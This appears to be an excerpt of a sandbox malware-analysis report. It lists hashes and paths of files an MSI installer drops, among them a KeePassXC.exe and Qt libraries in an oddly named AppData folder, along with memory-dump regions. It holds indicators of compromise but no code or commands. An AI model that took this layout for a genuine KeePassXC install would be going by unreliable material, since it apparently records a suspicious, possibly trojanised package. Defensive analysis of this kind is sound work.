SHA256 c1e94bf5215a5a3508e24f3a0ca7f2a621a993ec22bf53bfc7cfc54bbfd32301
SHA512 c6b12f914a037c509cb8533af7112be775613ec28c80ddea2e869fd2792cf89d470c22f3599c9f936625f1bc7fc291932d2caa9fe433ba355ced3fdc2d7866c6

memory/72-51-0x0000000007EB0000-0x0000000008072000-memory.dmp

memory/72-52-0x0000000008D70000-0x000000000929C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi4343.txt

MD5 d3cfb7d0c8d2e3fe6a0eb110baf7e755
SHA1 369e9d8630eda9fd3d0f9bf4daa815e33207ffd4
SHA256 5b0e557ac6fb728e4946ec8d27d97cab02d6e44dfc3a526d52643d758dbbff12
SHA512 2b1f4b3feba76460da5bbe70cf8c2744837859e8e9df2923984f99500a6a07cf996ea441aa245708d7a6f8616148360c7dc4eae989b9584e9869f8d3bbc12ebf

C:\Config.Msi\e574103.rbs

MD5 92e495317e17655e0243555c0f74315e
SHA1 7a86c450e9216b0850b22b57c9b8b283561a0db1
SHA256 29f0a15e076844e523dc919504b38c430d47eedfdd1c3849fac00ef7b7a3c74e
SHA512 f6d7f3451270d7ee66cbaadd7c2d8cc2b10018c02b32ff9246156e430939c8428e082f08c0d79d77d2ab4920aaf96a358184e48601688d756ace0f9771cc814c

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

MD5 fc16fce41560bed85c97d9551fdfc3c1
SHA1 26a867e66cd4730383046de480aa1785d4b93bf2
SHA256 e35a84063e76646544486d2b172c7f0ffd52d28f9f258379370979b73bdc0857
SHA512 0954901366b8d2e4bf9ff0450c072bac6cc89113f304dfae2ff87e9d3d4380780122e1ce81ce1d908a364ff1970da9e85e3a41b54b13b83d1c147611a39fde91

C:\Windows\Installer\e574100.msi

MD5 531a806e5efce1d6ee6085e67f518029
SHA1 45e6d6242fe8ef3986b0f2b66c72226f285bdd06
SHA256 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
SHA512 2df8901814180b2de3ffab09042c4be7f95ffb98d471f075477dead3500a046dd14e15946b3b9d72b7b8997fa745e1f866b1b518dea4b67a6ce548c0f895a4a1

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll

MD5 a542f74ee60dfbee3e8e919acb22e773
SHA1 8e3a47d726f3c7daf4b6168effbca676bcc0be2c
SHA256 f99611c9b7000dc50f4aeac26c590072bfecffdd1cba9903b6bed649eb14550c
SHA512 acfc819f23f49a296a9437a6f7aa2ce8066285312af5c72ca41973e7daa090e9ab6f30eeecb722756c2a5b3a70f959977f06c524cc11bf7c0bc99f1b3e58a7a1

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll

MD5 883d51ff2fa63084fef0b252c62b259c
SHA1 375993ca6c25195302cff56da2a7f70ed116b681
SHA256 699225b460328cc4d6f026a57b89472db56aef46a242066c83f4c404ab9f386d
SHA512 dbed13d06af7cb25c3cbe6f02be3663125a6a340e0f82e565f32d66448296af6188f98c1082d5110be567788c04f47ef402bc730ca4d5eb0fc29e3bc527a31f8

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll

MD5 b6b0178576ee844019d0f2fa214df8c8
SHA1 6bb884f83beac17f42597160d321d4ad2bd3c6c2
SHA256 455e4487b294c9648f2f4852ab68ba5d45e880bd1e8cf3d27e58150c2aedb20c
SHA512 e214e6232d4f2469769af243b01cde10e72ef1acdad1e92fe1e9cf7b74fd127831bc223a3ad983695f35e4eadfaff49110948d63e085c551094f534e33e04ab4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll

MD5 c72948b84d9dd02eb85f1774739eafa8
SHA1 1f255f8b808ee310dba95beb896a3ec360f16ebc
SHA256 2b1df97fb3cf4a54d68bf7ca2611f0cc0663908309fd58a48989804dc4fec284
SHA512 fda087b6e86cf02dcf4324e391be2f8ef54dce9cb787dbc343d90efd9d9f54189fe0994fee628c0465c1c9f51c6d1783955c8002215517fc5358ae1e7518067b

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll

MD5 fd240f08139a7bbefc3aeec099210579
SHA1 f2738c0a2b3ef6a51d7b89d731854a0924f71bfb
SHA256 e8e72f078844e6fc97fa9ed417eefef7fc30192b3f6f0074d6d6d80a176d3100
SHA512 14177b251e771c88148c9a2ff433f64c1a9c977320c42c882381e698fff7592148b6d7485c537bc720ac3685bb3cbef6cea63e50fe038c8f6a5b61e9460d16f4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libyubikey-0.dll

MD5 efd34359fa6e0cb9f3765d4831f862c8
SHA1 961d36e8941c66364744fbbe6bf0131367b4d57b
SHA256 f23649804997c19423dfa6899309a27c3f42202339b0ae4cb20de430f81982e9
SHA512 0ec82cc0f24656ce7e51cce8cce465572d31566dd562e2397641bbc72142062f1fa58f5892dfd9adbf7ab1e554f405911d757e9091a85d95fd2d3edd3a00f0e0

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll

MD5 411642ebdf422cac211237a449ffb139
SHA1 cfb06e94ccdc6704d8ea3f5659481c317a0371af
SHA256 23272d4c3f19a13fa236369d2a296202a3c7067fa1698572dea9c23b9eae00b7
SHA512 4a144c877ec977ba6db0166ba3a559b9201bdc66c0bcf11b4772565c713a5f6f207168490b3a8231e6d23dd6041ce01df66e3af7d6b4899a743e6c3bfe598670

memory/1496-182-0x00000000721F0000-0x00000000723EA000-memory.dmp

memory/1496-185-0x0000000000F40000-0x0000000000F65000-memory.dmp

memory/1080-187-0x0000000000110000-0x0000000000138000-memory.dmp

memory/1496-189-0x0000000062D80000-0x0000000062DBB000-memory.dmp

memory/1496-190-0x0000000000710000-0x0000000000CDF000-memory.dmp

memory/1496-188-0x0000000072BA0000-0x00000000732FD000-memory.dmp

memory/1080-186-0x0000000000110000-0x0000000000138000-memory.dmp

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libjson-c-2.dll

MD5 945bb6d5d03ed15f25aa2f79efcdff20
SHA1 1e1ecae2cd6c78df6feeda4b921f649d5c76f01f
SHA256 21f5a93fb4d8c3538468d08a706c0063a88aaeaa8a926d780b0a84a10c83f6f5
SHA512 2f36903b08165de3d4e9286de93400f532a7a0077e061bed02a8f8dea42f78cd2407c1d45dfa1a0bea5b9d0215167ad62a5eb5cacd9e3aa45e57b89b56722f86

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll

MD5 bb8004dd00979ea17a243df6d40f2b05
SHA1 482b4ea7b92e3aee7b13278ee79ce84ee7e09d7a
SHA256 7df7355b2968a68491356e377da1fc772776b43033eb13df0738df90fdf54d32
SHA512 060e0e12b7a54ea023e2790c8f35d930427c33ca566f88a253f322d1022e6e399ace6c550b42252df07e1c609e6dabc73ad62b8f712e8c5a3fa3380274079d52

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll

MD5 484a47b28f7e935039289146d8592c73
SHA1 328681021f9ef4ef52a12e8bc944edaf9eed5689
SHA256 fd02a3c891349da4d956a13e189b57f23e1d1a22209dad3875ff72e2e85cd541
SHA512 83b5dbac473dd390c739a38b8cebedfae7c9949f583ddbb69326b9bd39aab8c28d40e6951acf47c10ea2ac51620e2de96912ab7aced713985b263769277129b5

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll

MD5 cdf811c8e5fc6b313c91b19d2362dc2c
SHA1 26cc74948b8082c3a2e2f348bdff903954974ec0
SHA256 da173ce470873cc18134dba881f8018656ca0ad03fb0cb5a3ea8552b8785f9de
SHA512 322da5b6063a03f599f3fdf3e0f86eb541912b9dd7ae4dc9e4ff10b8133c8e3797ebd9f31872f403c257d6456edd7eca2d28915396d3aefaf549816a4b59ae8a

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll

MD5 e1cd8a087c9b045fb6e770f27ef03707
SHA1 6d5aff3ccbfd81f0760a0d8d22799dce4973acb6
SHA256 eaa197134ecc9c8995ececdea42aaaa5b09a2039a608452ae3223d976da8efa5
SHA512 3ef02820c5fa2ffaf461d16f000894ec696da38431a158205fc74947b47c93d0de793c54c0b801acd2f7ebe9cfef3970cf8960c47597e94e62adcbb09196101a

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll

MD5 f73bb12c46d209ab7317f3ef878d4abe
SHA1 bd8acd83f4eb5afbb6ea2c90fe40062c58fd1ef4
SHA256 edb71eb6815bde6ec47b1167c74d26f7d9fd08bb6d4cfc3c08683eaeda39dcde
SHA512 88d8381f639350bab0d360a32370eee325ae2d0c366c898ce23ffc62f85ad921776aa856219671d39620c25d7856c82f19b2e7cdde6ac641092b2df8a0ab70ef

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll

MD5 8b2a6e8419a8a4e7d3fd023d97455fb9
SHA1 2547a1f94fb4f83b7c133a3e285ee11faa155e84
SHA256 7087cdd1acdff6cd1b8d821388f430af3888314b05a5821bb53e67034362f670
SHA512 44438f6dd4becabc2cb3053e2c42877cbdb0f309fe272f67a94ad530caf1c5e5d49bc394f7d21c4226a4f0eb6d8661c5c7113508ea2f446e0dbea0d59554d4a4

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll

MD5 661ed9d4bd3bd416d31def947cd4f502
SHA1 d18fd6c6c9081648818a6654e5a74f8fcd21c1a3
SHA256 d72768f29c12fe808038feb80c8415bf8d47fe5e22a074214cf2c56bf90b7a09
SHA512 984e2b937ee469b86abc1a9b52407e746f976d01de2cf949e68dc079e498c1f7d5ec74b2ada7d5e0211f9d21b0e6ba4ce0ec66d1da73bcd11f1373022834f0bb

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll

MD5 270ca6cfb0bbb0cad78ce9b8d7ccc4f3
SHA1 eeed9ebcf68cc96e4c0e0a8c46010a7e634e207a
SHA256 e3659dab4b91636c27f3a41eda8d4afe59101021468eef539191d16a7b92da9e
SHA512 6c4102686fc83bdca4a495b1f68b5fe48a1be0e8c73bc8d97d0664a2ab1a6fde68f5e380dbfcb55698cc58fd42a9f04c47876a22167aa04be6b492ee0b7d91b6

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll

MD5 83761f6a5bebfa2383a456325688c851
SHA1 0eb04f6a54b76135816be039b8a14ef297cb48cc
SHA256 824f08f9f69b5a28baeef5ef9d9335f9ad87600a830e304b1c696e2f97a92727
SHA512 9851ff17d653c0ac8c75c8694d630773474e62d03f64fbce93258b64b999dba23e80d3f8e3cf0287b2a492574a4fdeb6bd8a86070946e9ef6dfb912c31ed4cee

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll

MD5 b015508d22a275d220481547617f74bf
SHA1 b65eb8773297d988ce034795e95d1455dd1f09e2
SHA256 cf928b42713f1ae39fd6a3f084ba3aaa4d28cef7cfcd57ddd3e2883214fa6e91
SHA512 02adea4881ca255cef289b357eefcc0c989fb0ad9e2a211b508bdbaea9d4becdd030615bd68ecd7696b0b5fd8c6efc6580c4f05147f455b6b6155d3fd01397b0

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll

MD5 3dc9596998ebac48a1ea9d5557649eeb
SHA1 16115408bab17885ad9bf95810dbd7a35f159e4a
SHA256 3880e50ab6e204b9fbc2952ff39411a530612ddcbd82c296d916065f37b755e6
SHA512 7a6641b3f8bcfbe165aeb8f7477f931188e58a72bae63dfe2ba1c86736cdc6c7f6c86c0d433badb64f3c799202a2f5439eab0f04362b5b882f7f5c346f9765f9

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll

MD5 76e68d56326f70acb1c20bc3ad9ea20d
SHA1 f1f74224abed3f01f643b2a103c41158e586d827
SHA256 d84b30cf544bbf0657df31e196196877fa874b011a275afdd4bd39729070891f
SHA512 fd786822ea98ceffcad9266c306afb0ad08a82d389925eb6a8b077c7b153afeb91a622b6e31f26bbb8fcfd14183e4e8c1ab495154322e977cb74e5d33529d681

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll

MD5 a1737041533ac620a8385c7b99046d18
SHA1 2154912e5ec6e84af91eb883f6fe41dfccef3b03
SHA256 8e214eec4218407c339f35cc4b133b82e264855a15c407f3f93fc12be93ac0db
SHA512 1508fe92ba0a0f14e93676f1d53923d0b91df4208d23897cd9003b0436bf826fb98ebd3514a8e6e9c15bf9d993fcb538dcfb0b8461f33bce835da736229804c2

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll

MD5 24dac6152c216a1b7b1afef7c36e2b65
SHA1 a832467931f07b3f41772d89feb194a90be4119b
SHA256 784af4a0d287a6611d5ee4fda32e31d7b3d5afcd14bca75d2564bb9f0045b449
SHA512 b4da7fe3e32fe1dc89197ec4f0a84c1cb38ff4d872f842f4692d1520e2b39efd2d7e3b928a8e225d2504aadf72a923ed7ee7e3552988c6365b9b30358912d6ce

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll

MD5 a33a65fc77e446a7dffb163e07610a8f
SHA1 a574215a88f53ef4f53d9b3c4b1905d6c2644202
SHA256 430d8036d0b568efe975fb7406156056e9ad16cd814d9b5de157704e85754a1a
SHA512 fe3b6af1d343e82b185fbb2fc5272f6f38baecd0a4e0d32c340f8ac0ee6d8b39661033ac64ecc58770fc7a2db328706b8c84abda756e42a88b6e972a9427d3ce

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll

MD5 31037212185611990b67b6831fbddb39
SHA1 7f20b8975654604b54e9809a5668ba266de3733e
SHA256 af646bb5c7d4844de540f187dddcaa9b573fd0a34646a7d16f961ed32c691f21
SHA512 a1573605550baeeb18f75d49e27d785169e389c2eae3b10f76471feed2485680ed785c66d28eeeea7cfdd0a8c6e539b7b872a4c7c93cd29713f8a500ab03c1e6

memory/1080-191-0x0000000000110000-0x0000000000138000-memory.dmp

memory/2416-201-0x000001CC3A370000-0x000001CC3A392000-memory.dmp

memory/1496-224-0x0000000071C60000-0x0000000071FA8000-memory.dmp

memory/1496-229-0x0000000071760000-0x0000000071827000-memory.dmp

memory/1496-222-0x0000000072190000-0x00000000721EC000-memory.dmp

memory/1496-228-0x0000000071890000-0x00000000718D5000-memory.dmp

memory/1496-227-0x00000000718E0000-0x00000000719F2000-memory.dmp

memory/1496-226-0x0000000071BC0000-0x0000000071C10000-memory.dmp

memory/1496-225-0x0000000071C10000-0x0000000071C5E000-memory.dmp

memory/1496-220-0x0000000072430000-0x0000000072A9F000-memory.dmp

memory/1496-219-0x0000000061840000-0x000000006185A000-memory.dmp

memory/1496-215-0x0000000072BA0000-0x00000000732FD000-memory.dmp

memory/1496-214-0x0000000073300000-0x0000000073380000-memory.dmp

memory/1496-213-0x0000000073380000-0x00000000733E7000-memory.dmp

memory/1496-212-0x0000000062D80000-0x0000000062DBB000-memory.dmp

memory/1496-211-0x00000000733F0000-0x000000007344D000-memory.dmp

memory/1496-210-0x0000000073450000-0x0000000073611000-memory.dmp

memory/1496-209-0x0000000073620000-0x0000000073BAA000-memory.dmp

memory/1496-208-0x0000000073BB0000-0x0000000073BC1000-memory.dmp

memory/1496-207-0x0000000074600000-0x000000007461C000-memory.dmp

memory/1496-206-0x0000000074620000-0x000000007471A000-memory.dmp

memory/1496-202-0x0000000000710000-0x0000000000CDF000-memory.dmp

memory/1496-204-0x0000000074720000-0x0000000074733000-memory.dmp

memory/1496-203-0x0000000074740000-0x0000000074766000-memory.dmp

memory/1496-223-0x0000000071FB0000-0x00000000720A5000-memory.dmp

memory/1496-221-0x00000000721F0000-0x00000000723EA000-memory.dmp

memory/1496-218-0x0000000072B10000-0x0000000072B28000-memory.dmp

memory/1496-217-0x0000000072B30000-0x0000000072B6A000-memory.dmp

memory/1496-216-0x0000000072B70000-0x0000000072B96000-memory.dmp

memory/1496-205-0x0000000073BD0000-0x0000000073DAB000-memory.dmp

memory/2416-243-0x000001CC3A870000-0x000001CC3A88C000-memory.dmp

memory/2416-268-0x000001CC3ABE0000-0x000001CC3ADA2000-memory.dmp

memory/2416-270-0x000001CC3B2E0000-0x000001CC3B808000-memory.dmp

memory/1080-271-0x0000000005350000-0x0000000005750000-memory.dmp

memory/1080-269-0x0000000005350000-0x0000000005750000-memory.dmp

memory/1080-274-0x0000000075140000-0x0000000075392000-memory.dmp

memory/1080-272-0x00007FFDC33C0000-0x00007FFDC35C9000-memory.dmp

memory/3692-275-0x00000000010E0000-0x00000000010E9000-memory.dmp

memory/3692-277-0x0000000002DF0000-0x00000000031F0000-memory.dmp

memory/3692-280-0x0000000075140000-0x0000000075392000-memory.dmp

memory/3692-278-0x00007FFDC33C0000-0x00007FFDC35C9000-memory.dmp